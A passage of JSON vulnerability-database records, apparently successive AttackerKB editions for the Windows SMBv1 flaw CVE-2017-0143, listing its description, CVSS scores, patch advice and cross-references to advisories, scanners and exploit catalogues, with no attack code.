"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2020-11-18T06:39:05", "differentElements": ["references_categories"], "edition": 2}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "01dc9ca8b7fbbb79f94752d0f03fd309", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-05-06T15:19:16", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-05-06T15:19:16", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-05-06T15:19:16", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.5", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["http://www.securityfocus.com/bid/96703", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2021-05-06T15:19:16", "differentElements": ["last_activity", "tags"], "edition": 3}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "f0a77ef28f32de2abf0e0871f79b1bf2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-07-01T15:37:35", "history": [], "viewCount": 4, "enchantments": {"dependencies": {"modified": "2021-07-01T15:37:35", "references": [{"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2021-07-01T15:37:35", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.6", "attackerkb": {"attackerValue": 5, "exploitability": 5}, "wildExploited": true, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {"Advisory": ["https://www.exploit-db.com/exploits/43970", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41891", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "Canonical": ["http://www.securityfocus.com/bid/96703", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143"], "Miscellaneous": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"]}, "tags": ["easy_to_develop", "high_privilege_access", "default_configuration", "common_enterprise", "pre_auth"], "mitre_vector": {}, "last_activity": "2000-01-01T10:00:00"}, "lastseen": "2021-07-01T15:37:35", "differentElements": ["cvss2", "cvss3", "description", "last_activity"], "edition": 4}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "ed4166a361b00934a88cd727154fabf4dc41d7f1593cc69b3a6c848b16e93ff2", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-07-20T20:14:39", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142602"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33895", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:42030", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96704", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", 